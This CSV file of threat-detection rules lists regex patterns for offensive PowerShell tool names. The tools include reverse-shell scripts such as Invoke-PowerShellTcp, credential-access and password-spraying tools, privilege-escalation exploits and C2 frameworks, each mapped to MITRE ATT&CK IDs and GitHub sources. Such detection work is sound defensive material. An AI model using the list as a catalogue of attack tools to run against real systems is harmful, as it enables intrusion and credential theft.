"*Invoke-PowerIncrease -SourceFilePath *",".{0,1000}Invoke\-PowerIncrease\s\-SourceFilePath\s.{0,1000}","offensive_tool_keyword","Invoke-PowerIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/The-Viper-One/Invoke-PowerIncrease","1","0","N/A","N/A","8","1","3","0","2024-08-01T18:10:02Z","2024-07-18T17:40:26Z","49318"
"*Invoke-PowerIncrease.ps1*",".{0,1000}Invoke\-PowerIncrease\.ps1.{0,1000}","offensive_tool_keyword","Invoke-PowerIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/The-Viper-One/Invoke-PowerIncrease","1","1","N/A","N/A","8","1","3","0","2024-08-01T18:10:02Z","2024-07-18T17:40:26Z","49319"
"*Invoke-PowerOptionsWMI*",".{0,1000}Invoke\-PowerOptionsWMI.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49320"
"*Invoke-PowerShellHistoryCheck*",".{0,1000}Invoke\-PowerShellHistoryCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49321"
"*Invoke-PowerShellIcmp*",".{0,1000}Invoke\-PowerShellIcmp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49322"
"*Invoke-PowerShellIcmp.ps1*",".{0,1000}Invoke\-PowerShellIcmp\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49323"
"*Invoke-PowerShellIcmp.ps1*",".{0,1000}Invoke\-PowerShellIcmp\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49324"
"*Invoke-PowerShellTcp*",".{0,1000}Invoke\-PowerShellTcp.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49325"
"*Invoke-PowerShellTcp*",".{0,1000}Invoke\-PowerShellTcp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49326"
"*Invoke-PowerShellTcp.ps1*",".{0,1000}Invoke\-PowerShellTcp\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49327"
"*Invoke-PowerShellTcp.ps1*",".{0,1000}Invoke\-PowerShellTcp\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49328"
"*Invoke-PowerShellTcp.ps1*",".{0,1000}Invoke\-PowerShellTcp\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49329"
"*Invoke-PowerShellTcpOneLine*",".{0,1000}Invoke\-PowerShellTcpOneLine.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49330"
"*Invoke-PowerShellTcpOneLine*",".{0,1000}Invoke\-PowerShellTcpOneLine.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49331"
"*Invoke-PowerShellTcpOneLine.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLine\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49332"
"*Invoke-PowerShellTcpOneLine.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLine\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49333"
"*Invoke-PowerShellTcpOneLine.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLine\.ps1.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","49334"
"*Invoke-PowerShellTcpOneLineBind*",".{0,1000}Invoke\-PowerShellTcpOneLineBind.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49335"
"*Invoke-PowerShellTcpOneLineBind.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLineBind\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49336"
"*Invoke-PowershellTranscriptionCheck*",".{0,1000}Invoke\-PowershellTranscriptionCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49337"
"*Invoke-PowerShellUdp*",".{0,1000}Invoke\-PowerShellUdp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49338"
"*Invoke-PowerShellUdp.ps1*",".{0,1000}Invoke\-PowerShellUdp\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49339"
"*Invoke-PowerShellUdp.ps1*",".{0,1000}Invoke\-PowerShellUdp\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49340"
"*Invoke-PowerShellUdpOneLine*",".{0,1000}Invoke\-PowerShellUdpOneLine.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49341"
"*Invoke-PowerShellUdpOneLine.ps1*",".{0,1000}Invoke\-PowerShellUdpOneLine\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49342"
"*Invoke-PowerShellUdpOneLine.ps1*",".{0,1000}Invoke\-PowerShellUdpOneLine\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49343"
"*Invoke-PowerShellWmi*",".{0,1000}Invoke\-PowerShellWmi.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49344"
"*Invoke-PowerShellWmi.ps1*",".{0,1000}Invoke\-PowerShellWmi\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49345"
"*Invoke-PowerThIEf*",".{0,1000}Invoke\-PowerThIEf.{0,1000}","offensive_tool_keyword","Invoke-PowerThIEf","An IE Post Exploitation Library released at Steelcon in Sheffield 7th July 2018.","T1027 - T1053 - T1114 - T1059 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/nettitude/Invoke-PowerThIEf","1","0","N/A","N/A","N/A","2","130","29","2025-02-27T23:17:17Z","2018-07-10T09:14:58Z","49346"
"*Invoke-PowerThIEf*",".{0,1000}Invoke\-PowerThIEf.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49347"
"*Invoke-PowerThIEf.ps1*",".{0,1000}Invoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49348"
"*Invoke-PPLDump*",".{0,1000}Invoke\-PPLDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49349"
"*Invoke-Prasadhak*",".{0,1000}Invoke\-Prasadhak.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49350"
"*Invoke-Prasadhak.ps1*",".{0,1000}Invoke\-Prasadhak\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49351"
"*Invoke-Pre2kSpray*",".{0,1000}Invoke\-Pre2kSpray.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","1","N/A","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","49352"
"*Invoke-PrintDemon*",".{0,1000}Invoke\-PrintDemon.{0,1000}","offensive_tool_keyword","Invoke-PrintDemon","This is an PowerShell Empire launcher PoC using PrintDemon and Faxhell. The module has the Faxhell DLL already embedded which leverages CVE-2020-1048 for privilege escalation. The vulnerability allows an unprivileged user to gain system-level privileges and is based on @ionescu007 PoC.","T1204 - T1208 - T1216 - T1055 - T1203","TA0001 - TA0007 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/BC-SECURITY/Invoke-PrintDemon","1","1","N/A","N/A","N/A","3","201","38","2020-10-17T17:04:24Z","2020-05-15T05:14:49Z","49353"
"*Invoke-PrintDemon.ps1*",".{0,1000}Invoke\-PrintDemon\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49354"
"*Invoke-Printnightmare.ps1*",".{0,1000}Invoke\-Printnightmare\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49355"
"*Invoke-PrintNightmareCheck*",".{0,1000}Invoke\-PrintNightmareCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49356"
"*Invoke-Privesc*",".{0,1000}Invoke\-Privesc.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","49357"
"*Invoke-Privesc*",".{0,1000}Invoke\-Privesc.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49358"
"*Invoke-PrivescAudit *",".{0,1000}Invoke\-PrivescAudit\s.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","49359"
"*Invoke-PrivescAudit*",".{0,1000}Invoke\-PrivescAudit.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49360"
"*Invoke-PrivescCheck*",".{0,1000}Invoke\-PrivescCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49361"
"*Invoke-PrivescCheck*",".{0,1000}Invoke\-PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49362"
"*Invoke-PrivescCheck.ps1*",".{0,1000}Invoke\-PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49363"
"*invokeprocesshunter*",".{0,1000}invokeprocesshunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49364"
